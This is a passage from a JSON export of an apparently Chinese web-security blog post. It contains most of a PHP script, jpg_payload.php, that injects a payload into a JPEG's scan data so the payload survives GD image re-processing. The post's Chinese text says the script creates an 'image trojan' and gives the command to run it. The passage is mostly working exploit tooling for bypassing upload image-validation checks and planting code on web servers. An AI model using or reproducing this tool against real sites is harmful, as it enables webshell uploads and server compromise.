&nbsp; &nbsp; &nbsp; &nbsp;  $size = $dis-&gt;readShort() - 2;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $dis-&gt;skip($size);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($marker === 0xDA) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $startPos = $dis-&gt;seek();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $outStreamTmp = <br> &nbsp; &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, 0, $startPos) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $miniPayload . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  str_repeat(\"\\0\",$nullbytePayloadSize) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, $startPos);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  checkImage('_'.$argv[1], $outStreamTmp, TRUE);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($extraBytes !== 0) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  while((!$dis-&gt;eof())) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($dis-&gt;readByte() === 0xFF) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($dis-&gt;readByte() !== 0x00) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $stopPos = $dis-&gt;seek() - 2;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $imageStreamSize = $stopPos - $startPos;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $outStream = <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, 0, $startPos) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $miniPayload . 
<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr(<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  str_repeat(\"\\0\",$nullbytePayloadSize).<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, $startPos, $imageStreamSize),<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  0,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $nullbytePayloadSize+$imageStreamSize-$extraBytes) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, $stopPos);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } elseif($correctImage) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $outStream = $outStreamTmp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(checkImage('payload_'.$argv[1], $outStream)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('Success!');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp;  unlink('payload_'.$argv[1]);<br> &nbsp;  die('Something\\'s wrong');<br> <br> &nbsp;  function checkImage($filename, $data, $unlink = FALSE) {<br> &nbsp; &nbsp; &nbsp;  global $correctImage;<br> &nbsp; &nbsp; &nbsp;  file_put_contents($filename, $data);<br> &nbsp; &nbsp; &nbsp;  $correctImage = TRUE;<br> &nbsp; &nbsp; &nbsp;  imagecreatefromjpeg($filename);<br> &nbsp; 
&nbsp; &nbsp;  if($unlink)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  unlink($filename);<br> &nbsp; &nbsp; &nbsp;  return $correctImage;<br> &nbsp;  }<br> <br> &nbsp;  function custom_error_handler($errno, $errstr, $errfile, $errline) {<br> &nbsp; &nbsp; &nbsp;  global $extraBytes, $correctImage;<br> &nbsp; &nbsp; &nbsp;  $correctImage = FALSE;<br> &nbsp; &nbsp; &nbsp;  if(preg_match('\/(\\d+) extraneous bytes before marker\/', $errstr, $m)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(isset($m[1])) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $extraBytes = (int)$m[1];<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> <br> &nbsp;  class DataInputStream {<br> &nbsp; &nbsp; &nbsp;  private $binData;<br> &nbsp; &nbsp; &nbsp;  private $order;<br> &nbsp; &nbsp; &nbsp;  private $size;<br> <br> &nbsp; &nbsp; &nbsp;  public function __construct($filename, $order = false, $fromString = false) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = '';<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;order = $order;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(!$fromString) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(!file_exists($filename) || !is_file($filename))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('File not exists ['.$filename.']');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = file_get_contents($filename);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = $filename;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;size = strlen($this-&gt;binData);<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function seek() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return ($this-&gt;size - strlen($this-&gt;binData));<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function skip($skip) {<br> &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp;  $this-&gt;binData = substr($this-&gt;binData, $skip);<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function readByte() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($this-&gt;eof()) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('End Of File');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $byte = substr($this-&gt;binData, 0, 1);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = substr($this-&gt;binData, 1);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return ord($byte);<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function readShort() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(strlen($this-&gt;binData) &lt; 2) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('End Of File');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $short = substr($this-&gt;binData, 0, 2);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = substr($this-&gt;binData, 2);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($this-&gt;order) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $short = (ord($short[1]) &lt;&lt; 8) + ord($short[0]);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $short = (ord($short[0]) &lt;&lt; 8) + ord($short[1]);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return $short;<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function eof() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return !$this-&gt;binData||(strlen($this-&gt;binData) === 0);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>?&gt;<\/pre>\n\n\n\n<p>\u4f7f\u7528php\u811a\u672c\u521b\u5efa\u4e00\u4e2a\u56fe\u7247\u9a6c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">php jpg_payload.php 
a.jpg<\/pre>\n\n\n\n<p>\u540e\u9762\u5c31\u57fa\u672c\u4e00\u81f4\u4e86<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>getimagesize()\u7c7b\u578b\u9a8c\u8bc1 \u8fd9\u4e2a\u51fd\u6570\u529f\u80fd\u4f1a\u5bf9\u76ee\u6807\u6587\u4ef6\u768416\u8fdb\u5236\u53bb\u8fdb\u884c\u4e00\u4e2a\u8bfb\u53d6\uff0c\u53bb\u8bfb\u53d6\u5934\u51e0\u4e2a\u5b57\u7b26\u4e32\u662f\u4e0d\u662f\u7b26\u5408\u56fe\u7247\u7684\u8981\u6c42\u7684  ...<\/p>\n","protected":false},"author":12,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":""},"categories":[31],"tags":[],"class_list":["post-344","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/posts\/344","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/comments?post=344"}],"version-history":[{"count":0,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/posts\/344\/revisions"}],"wp:attachment":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/media?parent=344"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/categories?post=344"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/tags?post=344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}